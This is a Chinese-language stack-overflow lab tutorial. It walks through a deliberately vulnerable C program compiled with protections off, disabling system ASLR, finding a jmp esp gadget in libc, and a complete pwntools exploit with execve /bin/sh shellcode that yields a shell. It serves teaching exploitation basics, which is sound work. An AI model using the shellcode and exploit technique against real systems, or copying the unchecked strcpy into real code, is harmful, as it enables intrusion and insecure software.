栈溢出练习

一，工具安装

pwntools工具安装
$ sudo apt-get update
$ sudo apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
$ sudo pip install --upgrade pip
$ sudo pip install --upgrade pwntools

gcc/gdb安装
$ sudo apt-get install gcc/gdb

peda安装
$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py" >> ~/.gdbinit    

二，程序

源码文件名为:StackOF.c

#include 
#include 

void vul(char *msg)
{
    char buffer[64];
    strcpy(buffer,msg);
    return;
}

int main()
{
    puts("So plz give me your shellcode:");
    char buffer[256];
    memset(buffer,0,256);
    read(0,buffer,256);
    vul(buffer);
    return 0;
}

可以看到，其是将main函数里的buffer作为msg传入vul函数里，然后拷贝到vul中的buffer,但是main函数中buffer大小为256，而vul函数中buffer的大小为64,这就是问题所在。

为了调试方便把保护操作关闭

gcc编译：gcc -m32 -no-pie -fno-stack-protector -z execstack -o pwnme StackOF.c

-m32：生成32位的可执行文件
-no-pie：关闭程序ASLR/PIE（程序随机化保护）
-fno-stack-protector：关闭Stack Protector/Canary（栈保护）
-z execstack：关闭DEP/NX（堆栈不可执行）
-o：输出
pwnme：编译生成文件的文件名
StackOF.c:编译前的源文件

尝试运行pwnme

观察分析所开启的漏洞缓解策略

最好加一条命令关闭系统的的地址随机化

echo 0 > /proc/sys/kernel/randomize_va_space

三，思路

由源码可知该栈溢出漏洞的原因是在调用strcpy之前未对源字符串的长度进行安全检查。结果就是用户输入过长时，会向高地址覆盖。

那我们可以布局成

假设jmp esp的地址为0x12345678，在运行到原返回地址位置也就是0x12345678时，会执行0x12345678处的指令，也就是jmp esp,同时esp会+4,这时esp就指向了shellcode的起始位置，jmp esp一执行，接下来就是执行shellcode,如图：

所以要构造的buffer = 填充字符 + jmp_esp +shellcode

四，具体解决分析

jmp esp咋整呢？这个我们可以去libc文件中查找（libc是个啥？），c编写的程序都要加载libc文件.

1.libc怎么找？

首先，我们先查看加载的libc文件是什么版本
打开gdb调试pwnme

直接在main函数上下断点

然后r运行，加载程序，在断点断下

输入 info sharedlibrary或i sharedlibrary

这个时候你就找到了(- _-)!!!

2.找到jmp esp在libc中的地址:jmp_esp_addr_offset

很简单，上代码

from pwn import *

libc = ELF('/lib32/libc.so.6')                                #文件
jmp_esp = asm('jmp esp')                                      #jmp esp汇编指令的操作数

jmp_esp_addr_in_libc = libc.search(jmp_esp).next()            #搜索

print hex(jmp_esp_addr_in_libc)                               #打印

效果

但但但但是！！！！这还没完，这个地址只是jmp esp在libc文件里的位置（也叫偏移地址，在最终代码将命名为jmp_esp_addr_offset），要知道其在程序里的地址还要加上libc在程序里的起始地址（也叫基址，在最终代码将命名为libc_base）,所以jmp esp在程序里的地址 : jmp_esp_addr = jmp_esp_addr_offset+libc_base,结合图解一下

3，找libc在程序里的地址：libc_base

输入指令LD_TRACE_LOADED_OBJECTS=1 ./pwnme可以得到加载位置

4.编写shellcode

通过调用系统调用获得shell
\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80

五，最终代码

from pwn import *

p = process('./pwnme')                    #运行程序
p.recvuntil("shellcode:")                 #当接受到字符串'shellcode:'

#找jmp_esp_addr_offset,见本文第四节第二点
libc = ELF('/lib32/libc.so.6')              
jmp_esp = asm('jmp esp')

jmp_esp_addr_offset = libc.search(jmp_esp).next()

if jmp_esp_addr_offset is None:
    print 'Cannot find jmp_esp in libc'
else:
    print hex(jmp_esp_addr_offset)

libc_base = 0xf7dd1000                              #你找到的libc加载地址
jmp_esp_addr = libc_base + jmp_esp_addr_offset      #得到jmp_esp_addr

print hex(jmp_esp_addr)

#构造布局,本文第三节
buf = 'A'*76                                                     #如何得到填充数据大小：https://www.jianshu.com/p/278f8d1f8322
buf += p32(jmp_esp_addr)
buf += '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'

with open('poc','wb') as f:
    f.write(buf)

p.sendline(buf)                                                #发送构造后的buf

p.interactive()

六，效果

输入 whoami测试一下

发现为 root用户，已经可以产生交互。
附上相关文章一篇： http://www.mamicode.com/info-detail-2232012.htm